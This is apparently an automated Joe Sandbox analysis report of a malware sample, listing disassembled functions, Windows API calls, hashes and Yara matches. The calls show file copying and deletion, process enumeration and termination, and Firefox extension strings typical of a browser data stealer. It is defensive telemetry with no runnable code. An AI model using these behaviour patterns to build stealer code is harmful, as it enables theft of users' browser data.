                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                            • String ID: <
                                            • API String ID: 1148417306-4251816714
                                            • Opcode ID: 780f5d4a84c50e8ab2f554c699b202a56bf3eaf7d4713dd72010fd50ff5fac83
                                            • Instruction ID: c931928f9b0e23438b1da22ff0978418d97e979ab9806511af6b3cfa4c9bd67e
                                            • Opcode Fuzzy Hash: 780f5d4a84c50e8ab2f554c699b202a56bf3eaf7d4713dd72010fd50ff5fac83
                                            • Instruction Fuzzy Hash: 05312CB1D01228ABDB14EB91DC98FEDB77AAF58300F40418EE20576190DF746B48CF66
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                            • HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                            • wsprintfW.USER32 ref: 00418F08
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocProcesswsprintf
                                            • String ID: %hs
                                            • API String ID: 659108358-2783943728
                                            • Opcode ID: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                            • Instruction ID: abe7276d6e58fd7f286e9bcc6e4dd5022fdd169b0d4b331efbe0e5b16b2cc016
                                            • Opcode Fuzzy Hash: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                            • Instruction Fuzzy Hash: 47E08C70E49308BBDB00DB94ED0AF6D77B8EB44302F000196FD0987340EA719F008B96
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,009CBD38,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040AA11
                                            • lstrlenA.KERNEL32(00000000,00000000), ref: 0040AB2F
                                            • lstrlenA.KERNEL32(00000000), ref: 0040ADEC
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040AE73
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                            • String ID:
                                            • API String ID: 257331557-0
                                            • Opcode ID: badd0b16bebf4880951e4b22bfce0ef8fa2e65dd17f4c9611185429b7f8720ee
                                            • Instruction ID: 5dfe8597df33c788f82f0551f3ba8d02d272d38f024b71a471f8e3c501a58f6f
                                            • Opcode Fuzzy Hash: badd0b16bebf4880951e4b22bfce0ef8fa2e65dd17f4c9611185429b7f8720ee
                                            • Instruction Fuzzy Hash: A9E134729111089BCB04FBA5DC66EEE7339AF14314F40855EF11672091EF387A9CCB6A
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 02468F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,02451660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02468F7D
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0245AC78
                                            • lstrlen.KERNEL32(00000000,00000000), ref: 0245AD96
                                            • lstrlen.KERNEL32(00000000), ref: 0245B053
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 0245A7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 0245A7E4
                                            • DeleteFileA.KERNEL32(00000000), ref: 0245B0DA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                            • String ID:
                                            • API String ID: 257331557-0
                                            • Opcode ID: 1555e5678c072ca4ab9446b2b40093215d410334d5d224d36f00ead4fe18f37f
                                            • Instruction ID: 2dc21c2940fbeac004d8b1c82c565794786a00aa8f81279bfbfc13dfbe43ac72
                                            • Opcode Fuzzy Hash: 1555e5678c072ca4ab9446b2b40093215d410334d5d224d36f00ead4fe18f37f
                                            • Instruction Fuzzy Hash: 50E1CF72840528ABCB19FBA5DC98DFE733AAF14305F50855EE556720A0EF306A4CCF62
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,009CBD38,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D581
                                            • lstrlenA.KERNEL32(00000000), ref: 0040D798
                                            • lstrlenA.KERNEL32(00000000), ref: 0040D7AC
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040D82B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: 4c1525e857f093a45c2341733fa41754f3496238513f024d29210b144bef9689
                                            • Instruction ID: cd95120e3309aa2a4ee5e09d67847ecab6e8b781cb92854c7d2ac691bd2160a2
                                            • Opcode Fuzzy Hash: 4c1525e857f093a45c2341733fa41754f3496238513f024d29210b144bef9689
                                            • Instruction Fuzzy Hash: CF911672E111089BCB04FBA1EC66DEE7339AF14314F50456EF11672095EF387A98CB6A
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 02468F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,02451660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02468F7D
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0245D7E8
                                            • lstrlen.KERNEL32(00000000), ref: 0245D9FF
                                            • lstrlen.KERNEL32(00000000), ref: 0245DA13
                                            • DeleteFileA.KERNEL32(00000000), ref: 0245DA92
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: c95315d137aedd934db08a2c32def760d310641930853bc4b112f3c5134ffc66
                                            • Instruction ID: 5b9fbaf447f6c6454b04c42968de931d8e344e68411997e0ab687a48ec33bdc2
                                            • Opcode Fuzzy Hash: c95315d137aedd934db08a2c32def760d310641930853bc4b112f3c5134ffc66
                                            • Instruction Fuzzy Hash: 6191E272D00628ABCB18FBA5DC58DFE733AAF14305F50456EE556B6090EF346A48CF62
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,009CBD38,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D901
                                            • lstrlenA.KERNEL32(00000000), ref: 0040DA9F
                                            • lstrlenA.KERNEL32(00000000), ref: 0040DAB3
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040DB32
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: 1acd3d45d618d939c79b20cdc9903d53f52bed8242236e24ba2a76c9b265152c
                                            • Instruction ID: 660f6b77f2ff2b442eb80c9f7963c7c0f8ff679996332a2a68bd7dee448c32b7
                                            • Opcode Fuzzy Hash: 1acd3d45d618d939c79b20cdc9903d53f52bed8242236e24ba2a76c9b265152c
                                            • Instruction Fuzzy Hash: 28812572E111089BCB04FBA5EC66DEE7339AF14314F40455FF10662095EF387A98CB6A
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 02468F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,02451660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02468F7D
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0245DB68
                                            • lstrlen.KERNEL32(00000000), ref: 0245DD06
                                            • lstrlen.KERNEL32(00000000), ref: 0245DD1A
                                            • DeleteFileA.KERNEL32(00000000), ref: 0245DD99
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: f963ddadb7543677bfe67c8cf6937e88a8e6e15d5c44649ac160fab5f8c80baf
                                            • Instruction ID: 49ecb9f225b3a7b65b675a5002acaf391d7955ac2d40cd9d318af39f866de03b
                                            • Opcode Fuzzy Hash: f963ddadb7543677bfe67c8cf6937e88a8e6e15d5c44649ac160fab5f8c80baf
                                            • Instruction Fuzzy Hash: 3C81E172D00628ABCB18FBA5DC58DFE773AAF14305F50456EE556B6090EF346A08CF62
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                            • Instruction ID: e4d37494bc400c0a65f7a44fab40f83ed1ebccb5f6fd337b0f80e90bb9bb22cb
                                            • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                            • Instruction Fuzzy Hash: 6151F37A500602EFDB698F1DD840BAA73A7FF20305F36412FD84547AA0D739A889CB94
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                              • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                              • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                              • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                              • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                              • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                              • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421678,00420D93), ref: 0040F64C
                                            • lstrlenA.KERNEL32(00000000), ref: 0040F66B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                            • String ID: ^userContextId=4294967295$moz-extension+++
                                            • API String ID: 998311485-3310892237
                                            • Opcode ID: 523766ba9e6db3e821a6d2c1536c81079b0302e78173aef5b8d6937599c7b161
                                            • Instruction ID: 3808d15f7e0f9f9184562117c9aa29465858450d569164ac2a98ea8b538c64df
                                            • Opcode Fuzzy Hash: 523766ba9e6db3e821a6d2c1536c81079b0302e78173aef5b8d6937599c7b161
                                            • Instruction Fuzzy Hash: 42517E72E011089BCB04FBA1ECA6DED7339AF54304F40852EF50667195EF386A5CCB6A
                                            APIs
                                            • memset.MSVCRT ref: 0041967B
                                              • Part of subcall function 00418EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                              • Part of subcall function 00418EE0: HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                              • Part of subcall function 00418EE0: wsprintfW.USER32 ref: 00418F08
                                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041973B
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419759
                                            • CloseHandle.KERNEL32(00000000), ref: 00419766
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                            • String ID:
                                            • API String ID: 396451647-0
                                            • Opcode ID: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
                                            • Instruction ID: 560ccd148ccd609fdd46163d5cc95655726043f4ba77f136f2594cdeec1b1660
                                            • Opcode Fuzzy Hash: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
                                            • Instruction Fuzzy Hash: C4315BB1E01208DBDB14DFE0DD49BEDB779BF44700F10445AF506AB284EB786A88CB56
                                            APIs
                                            • memset.MSVCRT ref: 024698E2
                                              • Part of subcall function 02469147: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,02469915,00000000), ref: 02469152
                                              • Part of subcall function 02469147: RtlAllocateHeap.NTDLL(00000000), ref: 02469159
                                              • Part of subcall function 02469147: wsprintfW.USER32 ref: 0246916F
                                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 024699A2
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 024699C0
                                            • CloseHandle.KERNEL32(00000000), ref: 024699CD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                            • String ID:
                                            • API String ID: 3729781310-0
                                            • Opcode ID: 4dd47c962113320da772e9fd3d5ef9085dc50e719928fc1b4404ad0ba2226614
                                            • Instruction ID: 7aa6c7d799509b460fae0320472e8cc9ec257fd2dfd2966a8c2c020cfb6cd781
                                            • Opcode Fuzzy Hash: 4dd47c962113320da772e9fd3d5ef9085dc50e719928fc1b4404ad0ba2226614
                                            • Instruction Fuzzy Hash: 5D311AB1E01258EBDB14DFE0CD48BEDB779FB44700F50455AE506AA284EBB4AA48CF52
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 02468AC1
                                            • Process32First.KERNEL32(?,00000128), ref: 02468AD5
                                            • Process32Next.KERNEL32(?,00000128), ref: 02468AEA
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • CloseHandle.KERNEL32(?), ref: 02468B58
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                            • String ID:
                                            • API String ID: 1066202413-0
                                            • Opcode ID: 25991fec1edfc484e0ac6d238269bf31d59a6f809c3b303f04a25542f2153d22
                                            • Instruction ID: 7aafb6e89db6f48d2590e240f07cc8c35d8786e2d60381e735e40d793e1cfca5
                                            • Opcode Fuzzy Hash: 25991fec1edfc484e0ac6d238269bf31d59a6f809c3b303f04a25542f2153d22
                                            • Instruction Fuzzy Hash: 5E313EB1941668ABCB24DF91DC48FFEB779EB44705F10459EE50AA21A0DB306E48CF92
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
                                            • wsprintfA.USER32 ref: 004189E0
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocProcesslstrcpywsprintf
                                            • String ID: %dx%d
                                            • API String ID: 2716131235-2206825331
                                            • Opcode ID: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
                                            • Instruction ID: ec511e81278765dc739de052021e02f912fcc6e2b9c8bb96b49730fbd7d6010e
                                            • Opcode Fuzzy Hash: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
                                            • Instruction Fuzzy Hash: 8B217FB1E45214AFDB00DFD4DC45FAEBBB9FB48710F10411AFA05A7280D779A900CBA5
                                            APIs
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024CF27A
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024CF293
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Value___vcrt_
                                            • String ID:
                                            • API String ID: 1426506684-0
                                            • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                            • Instruction ID: 456e0cdec6dc44299a762c07ab1db81f5ee401c23998f4bb30885b108dfa9f5f
                                            • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                            • Instruction Fuzzy Hash: A801683E2086219EF76016796CC4F5B2796EB013B4B30832FE52A895E0EF56480489C0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcessstrtok_s
                                            • String ID:
                                            • API String ID: 3407564107-0
                                            • Opcode ID: bbbcb8835864335667ee073c6e85149c6edd079fa0b75eecad9fe8ddf8d51a3e
